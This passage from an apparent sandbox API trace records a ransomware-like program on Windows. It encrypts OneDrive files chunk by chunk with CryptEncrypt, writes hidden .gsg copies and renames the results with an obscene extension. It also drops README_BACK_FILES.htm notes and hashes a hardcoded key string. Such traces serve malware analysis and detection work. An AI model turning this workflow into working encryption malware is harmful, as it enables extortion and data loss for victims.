lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.658] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.658] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.658] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.658] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.660] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.660] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.661] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.661] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.661] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.661] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.661] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.661] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.661] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.661] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.662] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.662] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.662] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.662] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.662] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.662] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.662] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.662] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.663] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.663] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.663] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.663] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.663] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.663] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.663] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.663] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.663] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.663] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.664] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.664] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.664] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.664] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.664] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.664] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.664] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.664] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.665] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.665] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.665] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.665] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.665] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.665] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.665] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.665] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.665] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.665] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x248, lpOverlapped=0x0) returned 1 [0273.666] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x248, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x250) returned 1 [0273.666] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0273.666] CloseHandle (hObject=0x5d48) returned 1 [0273.666] CloseHandle (hObject=0x5d4c) returned 1 [0273.666] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.691] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.692] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.694] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.696] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.696] CryptDestroyKey (hKey=0x2fae08) returned 1 [0273.696] CryptReleaseContext (hProv=0x2f28c28, dwFlags=0x0) returned 1 [0273.696] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.696] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0273.696] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\readme_back_files.htm")) returned 0xffffffff [0273.696] AreFileApisANSI () returned 1 [0273.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0273.697] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca-es-valencia\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca-es-valencia\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.698] GetFileType (hFile=0x5d3c) returned 0x1 [0273.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.701] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.701] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0273.701] GetLastError () returned 0x0 [0273.701] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\collectsynclogs.bat")) returned 0x20 [0273.701] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat", dwFileAttributes=0x80) returned 1 [0273.702] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\collectsynclogs.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.703] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\collectsynclogs.bat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.705] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\CollectSyncLogs.bat.gsg", dwFileAttributes=0x2) returned 1 [0273.705] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0273.718] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0273.718] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0273.718] CryptHashData 